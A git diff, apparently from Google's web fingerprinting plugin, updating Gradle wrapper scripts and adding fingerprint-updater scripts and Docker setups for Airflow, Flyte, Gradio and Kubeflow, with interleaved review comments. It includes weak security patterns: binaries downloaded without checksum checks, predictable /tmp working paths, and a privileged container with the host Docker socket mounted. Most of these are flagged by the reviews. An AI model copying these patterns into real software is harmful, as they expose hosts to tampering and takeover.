@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/fingerprinters/web/gradlew.bat b/google/fingerprinters/web/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/fingerprinters/web/gradlew.bat +++ b/google/fingerprinters/web/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% 
@@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal 
diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml b/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml new file mode 100755 index 000000000..8b1378917 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/app/docker-compose.yaml @@ -0,0 +1 @@ + diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/update.sh b/google/fingerprinters/web/scripts/updater/community/airflow/update.sh new file mode 100755 index 000000000..a7ff42bd6 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/update.sh 
@@ -0,0 +1,94 @@ +#!/usr/bin/env bash + +# Copyright 2024 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Airflow. +APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/airflow_fingerprints" +# Path to the local git repository for Airflow codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/airflow.binproto" +# Read all the versions to be fingerprinted. 
+readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startAirflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + COMPOSE_HTTP_TIMEOUT=200 AIRFLOW_UID=65535 docker-compose -f airflow-${version}.yaml up -d + popd >/dev/null +} + +stopAirflow() { + local version="$1" + pushd "${APP_PATH}" >/dev/null + COMPOSE_HTTP_TIMEOUT=200 AIRFLOW_UID=65535 docker-compose -f airflow-${version}.yaml down --volumes --remove-orphans + popd >/dev/null +} + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/airflow.binproto" \ + "${JSON_DATA}" + +# Fetch Airflow codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/apache/airflow.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for version in "${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Airflow version ${version} ..." + # Download docker-compose.yaml of each version. + curl -L https://airflow.apache.org/docs/apache-airflow/${version}/docker-compose.yaml -o $APP_PATH/airflow-${version}.yaml + # Start a live instance of Airflow. + startAirflow "${version}" + # Arbitrarily chosen so that Airflow is up and running. + echo "Waiting for Airflow ${version} to be ready ..." + sleep 60 + # No need to do other installation process for Airflow. + touch ${FINGERPRINTS_PATH}/fingerprint.${version}.json + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${version}" + + updateFingerprint \ + "airflow" \ + "${version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}" \ + "http://localhost:8080" + + # Stop the live instance of Airflow. + stopAirflow "${version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Airflow. Please commit the following file:" +echo " ${BIN_DATA}" 
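Review bot: The `curl -L` call in the version loop has no `--fail` and leaves `$APP_PATH` and `${version}` unquoted, so an HTTP error page for a version the docs site does not serve is saved as `airflow-${version}.yaml` and handed to `docker-compose`; `curl -fsSL "https://airflow.apache.org/docs/apache-airflow/${version}/docker-compose.yaml" -o "${APP_PATH}/airflow-${version}.yaml"` stops at the download instead. With `set -e` and no `trap`, a failure in `checkOutRepo` or `updateFingerprint` exits before `stopAirflow` runs and leaves the containers and volumes up; a cleanup `trap` on `EXIT` that stops the current version would cover it, and the flyte `update.sh` added in this commit has the same gap. `TMP_DATA` is a fixed path under `/tmp` and the clone is skipped whenever `${GIT_REPO}` already exists, so whatever sits in that directory is treated as the Airflow source tree; a directory from `mktemp -d`, or one under the user's home, avoids stale or foreign content on a shared host (same pattern in the flyte script).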
diff --git a/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt b/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt new file mode 100755 index 000000000..70ef91b70 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/airflow/versions.txt @@ -0,0 +1,40 @@ +2.8.4 +2.8.3 +2.8.2 +2.8.1 +2.8.0 +2.7.3 +2.7.2 +2.7.1 +2.7.0 +2.6.3 +2.6.2 +2.6.1 +2.6.0 +2.5.3 +2.5.2 +2.5.1 +2.5.0 +2.4.3 +2.4.2 +2.4.1 +2.4.0 +2.3.4 +2.3.3 +2.3.2 +2.3.1 +2.3.0 +2.2.5 +2.2.4 +2.2.3 +2.2.2 +2.2.1 +2.2.0 +2.1.4 +2.1.3 +2.1.2 +2.1.1 +2.1.0 +2.0.2 +2.0.1 +2.0.0 diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml new file mode 100644 index 000000000..70772b749 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/flyte/app/docker-compose.yml @@ -0,0 +1,8 @@ +services: + flyte-console: + image: ghcr.io/flyteorg/flyteconsole-release:${FLYTE_CONSOLE_VERSION} + ports: + - 8080:8080 + environment: + BASE_URL: "/console" + CONFIG_DIR: "/etc/flyte/config" diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/update.sh b/google/fingerprinters/web/scripts/updater/community/flyte/update.sh new file mode 100755 index 000000000..c90d71558 --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/flyte/update.sh 
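Review bot: In the flyte `docker-compose.yml`, `- 8080:8080` publishes the console on every interface of the machine that runs the updater, while `update.sh` only reaches it through `http://localhost:8080/console/`. `- "127.0.0.1:8080:8080"` keeps the throwaway instance reachable from the local host only. Writing the mapping as a quoted string is also the form the Compose documentation recommends for port entries.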
@@ -0,0 +1,97 @@ +#!/usr/bin/env bash + +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Flyte. +FLYTE_APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/FLYTE_fingerprints" +# Path to the local git repository for Flyte codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. 
+readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startFlyteConsole() { + local version="$1" + pushd "${FLYTE_APP_PATH}" >/dev/null + FLYTE_CONSOLE_VERSION="${version}" docker compose up -d + popd >/dev/null +} + +stopFlyteConsole() { + local version="$1" + pushd "${FLYTE_APP_PATH}" >/dev/null + FLYTE_CONSOLE_VERSION="${version}" docker compose down --volumes --remove-orphans + popd >/dev/null +} + +createFingerprintForDashboard() { + local FLYTE_CONSOLE_VERSION="$1" + + echo "Fingerprinting Flyte version ${FLYTE_CONSOLE_VERSION} ..." + # Start a live instance of Flyte. + startFlyteConsole "${FLYTE_CONSOLE_VERSION}" + # Arbitrarily chosen so that FlyteFlyte is up and running. + echo "Waiting for Flyte ${FLYTE_CONSOLE_VERSION} to be ready ..." + sleep 10 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "${FLYTE_CONSOLE_VERSION}" + + updateFingerprint \ + "flyte" \ + "${FLYTE_CONSOLE_VERSION}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/website/console" \ + "http://localhost:8080/console/" + + # Stop the live instance of Flyte. + stopFlyteConsole "${FLYTE_CONSOLE_VERSION}" +} + + +# Convert the existing data file to a human-readable json file. +convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/flyte.binproto" \ + "${JSON_DATA}" + +# Fetch Flyte codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/flyteorg/flyteconsole.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for FLYTE_CONSOLE_VERSION in "${ALL_VERSIONS[@]}"; do + createFingerprintForDashboard "${FLYTE_CONSOLE_VERSION}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Flyte. Please commit the following file:" +echo " ${BIN_DATA}" \ No newline at end of file 
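Review bot: `TMP_DATA="/tmp/FLYTE_fingerprints"` is a fixed path in a world-writable directory, and the later `[[ ! -d "${GIT_REPO}" ]]` check skips the clone whenever `${TMP_DATA}/repo` already exists. On a shared machine another local user can pre-create that directory, so the script would fingerprint from, and write its results into, a tree it does not own. A per-user location such as `TMP_DATA="${XDG_CACHE_HOME:-$HOME/.cache}/flyte_fingerprints"` keeps the clone reusable between runs; `mktemp -d` is the alternative if reuse is not needed. The gradio, kubeflow and mlflow update.sh files in this commit use the same fixed `/tmp/..._fingerprints` pattern.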
diff --git a/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt b/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt
new file mode 100644
index 000000000..dc61061f8
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/flyte/versions.txt
@@ -0,0 +1,26 @@
+v1.12.0
+v1.11.0
+v1.10.0
+v1.9.1
+v1.9.0
+v1.8.1
+v1.8.0
+v1.7.0
+v1.6.2
+v1.6.1
+v1.6.0
+v1.5.1
+v1.5.0
+v1.4.3
+v1.4.2
+v1.4.1
+v1.4.0
+v1.3.0
+v1.2.1
+v1.2.0
+v1.1.6
+v1.1.3
+v1.1.0
+v1.1.1
+v1.0.0
+v0.19.4
diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile b/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile
new file mode 100644
index 000000000..85510e999
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/Dockerfile
@@ -0,0 +1,11 @@
+FROM python:3.9-slim
+
+ARG version
+
+RUN python -m pip install gradio==$version
+
+ADD test_app.py /workspace/
+
+EXPOSE 8000
+
+CMD [ "python3" , "/workspace/test_app.py" ]
\ No newline at end of file
diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml
new file mode 100644
index 000000000..470660edd
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/docker-compose.yml
@@ -0,0 +1,8 @@
+services:
+ gradio:
+ build:
+ context: .
+ args:
+ version: ${GRADIO_VERSION}
+ ports:
+ - "8000:8000"
\ No newline at end of file
diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py b/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py
new file mode 100644
index 000000000..1d44fd9bb
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/gradio/app/test_app.py
@@ -0,0 +1,13 @@
+import gradio as gr
+
+def greet(name, intensity):
+ return "Hello, " + name + "!" * int(intensity)
+
+demo = gr.Interface(
+ fn=greet,
+ inputs=["text", "slider"],
+ outputs=["text"],
+)
+
+if __name__ == "__main__":
+ demo.launch(server_name="0.0.0.0", server_port=8000)
\ No newline at end of file
diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/update.sh b/google/fingerprinters/web/scripts/updater/community/gradio/update.sh
new file mode 100755
index 000000000..c848d74b7
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/gradio/update.sh
@@ -0,0 +1,90 @@ +#!/usr/bin/env bash + +# Copyright 2022 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +set -e + +source ../../common.sh + +SCRIPT_PATH="$(cd -- "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P)" +# Root path to the web fingerprinter plugin. +PROJECT_ROOT="$(cd -- "${SCRIPT_PATH}/../../../.." >/dev/null 2>&1 ; pwd -P)" +# Path to the configurations for starting a live instance of Gradio. +GRADIO_APP_PATH="${SCRIPT_PATH}/app" +# Path to the temporary data holder. +TMP_DATA="/tmp/gradio_fingerprints" +# Path to the local git repository for Gradio codebase. +GIT_REPO="${TMP_DATA}/repo" +# Path to the directory of all the updated fingerprints data. +FINGERPRINTS_PATH="${TMP_DATA}/fingerprints" +# Json data of the final result. +JSON_DATA="${FINGERPRINTS_PATH}/fingerprint.json" +# Binary proto data of the final result. +BIN_DATA="${FINGERPRINTS_PATH}/fingerprint.binproto" +# Read all the versions to be fingerprinted. +readarray -t ALL_VERSIONS < "${SCRIPT_PATH}/versions.txt" +mkdir -p "${FINGERPRINTS_PATH}" + +startGradio() { + local version="$1" + pushd "${GRADIO_APP_PATH}" >/dev/null + GRADIO_VERSION="${version}" docker-compose up --build -d + popd >/dev/null +} + +stopGradio() { + local version="$1" + pushd "${GRADIO_APP_PATH}" >/dev/null + GRADIO_VERSION="${version}" docker-compose down --volumes --remove-orphans + popd >/dev/null +} + +# Convert the existing data file to a human-readable json file. 
+convertFingerprint \ + "${PROJECT_ROOT}/src/main/resources/fingerprinters/web/data/community/gradio.binproto" \ + "${JSON_DATA}" + +# Fetch Gradio codebase. +if [[ ! -d "${GIT_REPO}" ]] ; then + git clone https://github.com/gradio-app/gradio.git "${GIT_REPO}" +fi + +# Update for all the versions listed in versions.txt file. +for gradio_version in "${ALL_VERSIONS[@]}"; do + echo "Fingerprinting Gradio version ${gradio_version} ..." + # Start a live instance of Gradio. + startGradio "${gradio_version}" + # Arbitrarily chosen so that Gradio is up and running. + echo "Waiting for Gradio ${gradio_version} to be ready ..." + sleep 30 + + # Checkout the repository to the correct tag. + checkOutRepo "${GIT_REPO}" "gradio@${gradio_version}" + + updateFingerprint \ + "gradio" \ + "${gradio_version}" \ + "${FINGERPRINTS_PATH}" \ + "${GIT_REPO}/js/app/public/" \ + "http://localhost:8000" + + # Stop the live instance of Gradio. + stopGradio "${gradio_version}" +done + +convertFingerprint "${JSON_DATA}" "${BIN_DATA}" + +echo "Fingerprint updated for Gradio. Please commit the following file:" +echo " ${BIN_DATA}" diff --git a/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt b/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt new file mode 100644 index 000000000..8a28d3bcb --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/gradio/versions.txt 
@@ -0,0 +1,79 @@ +4.36.1 +4.36.0 +4.35.0 +4.33.0 +4.32.2 +4.32.1 +4.32.0 +4.31.5 +4.31.4 +4.31.3 +4.31.2 +4.31.1 +4.31.0 +4.29.0 +4.28.3 +4.28.2 +4.28.1 +4.28.0 +4.27.0 +4.26.0 +4.25.0 +4.24.0 +4.23.0 +4.22.0 +4.21.0 +4.20.1 +4.20.0 +4.19.2 +4.19.1 +4.19.0 +4.18.0 +4.17.0 +4.16.0 +4.15.0 +4.14.0 +4.13.0 +4.12.0 +4.11.0 +4.10.0 +4.9.1 +4.9.0 +4.8.0 +4.7.0 +4.5.0 +4.4.1 +4.4.0 +4.3.0 +4.2.0 +4.1.2 +4.1.1 +4.1.0 +4.0.2 +4.0.1 +4.0.0 +4.0.0-beta.15 +3.50.2 +3.50.1 +3.50.0 +3.49.0 +3.48.0 +3.47.1 +3.47.0 +3.46.1 +3.46.0 +3.45.2 +3.45.1 +3.45.0 +3.44.4 +3.44.3 +3.44.2 +3.44.1 +3.44.0 +3.43.2 +3.43.1 +3.43.0 +3.42.0 +3.41.2 +3.41.1 +3.41.0 \ No newline at end of file diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind new file mode 100644 index 000000000..ac28c213c --- /dev/null +++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/Dockerfile.kind @@ -0,0 +1,36 @@ +FROM alpine:3.8 + +RUN apk add --no-cache \ + bash \ + curl \ + docker \ + git \ + jq \ + openssl \ + shadow \ + vim \ + wget + +# Add Limited user +RUN groupadd -r kinduser \ + -g 777 && \ + useradd -c "kinduser runner account" \ + -g kinduser \ + -u 777 \ + -m \ + -r \ + kinduser && \ + usermod -aG docker kinduser + + +RUN curl -LO https://storage.googleapis.com/kubernetes-release/release/v1.17.0/bin/linux/amd64/kubectl && \ + chmod +x ./kubectl && \ + mv ./kubectl /usr/local/bin/kubectl + +# Install Kubernetes in Docker (kind) +RUN curl -Lo ./kind https://github.com/kubernetes-sigs/kind/releases/download/v0.7.0/kind-linux-amd64 && \ + chmod +x ./kind && \ + mv ./kind /usr/local/bin/kind + +EXPOSE 58080 +WORKDIR /src diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh new file mode 100644 index 000000000..8aa6cf8e3 --- /dev/null 
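Review bot: Dockerfile.kind downloads `kubectl` (v1.17.0) and `kind` (v0.7.0) with curl and marks them executable without checking a digest, so whatever the download returns runs inside a container that kubeflow/app/docker-compose.yml starts privileged with the host Docker socket mounted. Pin each binary to a known SHA-256 and fail the build on a mismatch, for example `echo "<KIND_SHA256_PLACEHOLDER>  ./kind" | sha256sum -c -` before the `chmod`. Separately, `kinduser` is created but no `USER kinduser` follows, so the "limited user" is never used, and `alpine:3.8` is a long-unsupported base image.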
+++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/app_startup.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+
+while [ ! -f /lockconfig/lock ]; do
+ echo "Waiting for the file to be created by cluster"
+ sleep 2
+done
+
+# Define the Gunicorn start command
+GUNICORN_CMD="gunicorn -w 3 --bind 0.0.0.0:5000 --access-logfile - entrypoint:app"
+
+# Function to start Gunicorn
+start_gunicorn() {
+ echo "Starting Gunicorn..."
+ $GUNICORN_CMD
+}
+
+# Function to monitor and restart Gunicorn if it exits
+monitor_gunicorn() {
+ while true; do
+ start_gunicorn
+
+ # Wait for Gunicorn to exit
+ wait $!
+
+ # Log the exit and attempt a restart
+ echo "Gunicorn exited. Restarting..."
+ sleep 1 # Optional sleep before restarting
+ done
+}
+
+# Start monitoring Gunicorn
+monitor_gunicorn
diff --git a/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml
new file mode 100644
index 000000000..089f8e77b
--- /dev/null
+++ b/google/fingerprinters/web/scripts/updater/community/kubeflow/app/docker-compose.yml
@@ -0,0 +1,41 @@
+version: '3.7'
+
+services:
+ kind:
+ image: kind_cluster:latest
+ privileged: true
+ volumes:
+ - /var/run/docker.sock:/var/run/docker.sock
